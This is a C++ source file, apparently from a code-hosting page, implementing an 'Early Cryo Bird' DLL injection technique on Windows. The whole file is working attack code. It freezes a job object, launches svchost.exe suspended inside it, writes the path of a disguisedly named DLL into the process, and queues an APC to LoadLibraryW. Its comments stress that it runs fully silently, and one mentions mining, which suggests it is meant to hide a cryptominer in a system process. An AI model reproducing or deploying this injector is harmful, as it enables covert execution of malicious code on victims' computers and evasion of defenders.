87 lines
4.0 KiB
C++
87 lines
4.0 KiB
C++
// Early-Cryo-Bird-DLL-Injection.cpp — FULLY SILENT & INSTANT (2025)
|
|
// No console output, no getchar(), no user input required
|
|
|
|
#define _CRT_SECURE_NO_WARNINGS
|
|
#include <windows.h>
|
|
#include <winternl.h>
|
|
#include <iostream>
|
|
|
|
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
|
|
#define JobObjectFreezeInformation 18
|
|
|
|
typedef const OBJECT_ATTRIBUTES* PCOBJECT_ATTRIBUTES;
|
|
|
|
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE, PVOID, PVOID, PVOID, PVOID);
|
|
typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);
|
|
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemoryEx)(HANDLE, PVOID*, PSIZE_T, ULONG, ULONG, PVOID, ULONG);
|
|
typedef NTSTATUS(NTAPI* pSetInformationJobObject)(HANDLE, JOBOBJECTINFOCLASS, PVOID, ULONG);
|
|
typedef NTSTATUS(NTAPI* pNtCreateJobObject)(PHANDLE, ACCESS_MASK, PCOBJECT_ATTRIBUTES);
|
|
|
|
HMODULE hNtDll = GetModuleHandleA("ntdll.dll");
|
|
|
|
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtDll, "NtQueueApcThread");
|
|
pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtDll, "NtWriteVirtualMemory");
|
|
pNtAllocateVirtualMemoryEx NtAllocateVirtualMemoryEx = (pNtAllocateVirtualMemoryEx)GetProcAddress(hNtDll, "NtAllocateVirtualMemoryEx");
|
|
pSetInformationJobObject NtSetInformationJobObject = (pSetInformationJobObject)GetProcAddress(hNtDll, "NtSetInformationJobObject");
|
|
pNtCreateJobObject NtCreateJobObject = (pNtCreateJobObject)GetProcAddress(hNtDll, "NtCreateJobObject");
|
|
|
|
typedef struct _JOBOBJECT_FREEZE_INFORMATION {
|
|
union { ULONG Flags; struct { ULONG FreezeOperation : 1; ULONG FilterOperation : 1; ULONG SwapOperation : 1; ULONG Reserved : 29; }; };
|
|
BOOLEAN Freeze;
|
|
BOOLEAN Swap;
|
|
UCHAR Reserved0[2];
|
|
struct { ULONG HighEdgeFilter; ULONG LowEdgeFilter; } WakeFilter;
|
|
} JOBOBJECT_FREEZE_INFORMATION, *PJOBOBJECT_FREEZE_INFORMATION;
|
|
|
|
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
|
|
// FULLY SILENT — no console
|
|
const wchar_t dllPath[] = L"C:\\Users\\MyWindowsUser\\Downloads\\libphotoshop.dll";
|
|
SIZE_T dllPathLen = sizeof(dllPath);
|
|
SIZE_T regionSize = dllPathLen;
|
|
|
|
HANDLE hJob = NULL;
|
|
NtCreateJobObject(&hJob, MAXIMUM_ALLOWED, NULL);
|
|
|
|
JOBOBJECT_FREEZE_INFORMATION freezeInfo = { 0 };
|
|
freezeInfo.FreezeOperation = 1;
|
|
freezeInfo.Freeze = TRUE;
|
|
NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
|
|
|
|
STARTUPINFOEXW siEx = { sizeof(siEx) };
|
|
SIZE_T attrListSize = 0;
|
|
InitializeProcThreadAttributeList(NULL, 1, 0, &attrListSize);
|
|
siEx.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrListSize);
|
|
InitializeProcThreadAttributeList(siEx.lpAttributeList, 1, 0, &attrListSize);
|
|
UpdateProcThreadAttribute(siEx.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_JOB_LIST, &hJob, sizeof(HANDLE), NULL, NULL);
|
|
|
|
PROCESS_INFORMATION pi = { 0 };
|
|
CreateProcessW(
|
|
L"C:\\Windows\\System32\\svchost.exe", // or dllhost.exe / notepad.exe
|
|
NULL, NULL, NULL, FALSE,
|
|
CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT,
|
|
NULL, NULL, (STARTUPINFOW*)&siEx, &pi
|
|
);
|
|
|
|
DeleteProcThreadAttributeList(siEx.lpAttributeList);
|
|
HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
|
|
|
|
PVOID remoteMemory = NULL;
|
|
NtAllocateVirtualMemoryEx(pi.hProcess, &remoteMemory, ®ionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, NULL, 0);
|
|
NtWriteVirtualMemory(pi.hProcess, remoteMemory, (PVOID)dllPath, dllPathLen, NULL);
|
|
|
|
FARPROC loadLibAddr = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
|
|
NtQueueApcThread(pi.hThread, (PVOID)loadLibAddr, remoteMemory, NULL, NULL);
|
|
|
|
// INSTANT UNFREEZE — no user input
|
|
freezeInfo.Freeze = FALSE;
|
|
NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
|
|
|
|
ResumeThread(pi.hThread); // optional: resume main thread (not needed for mining)
|
|
|
|
CloseHandle(hJob);
|
|
CloseHandle(pi.hThread);
|
|
CloseHandle(pi.hProcess);
|
|
|
|
return 0;
|
|
}
|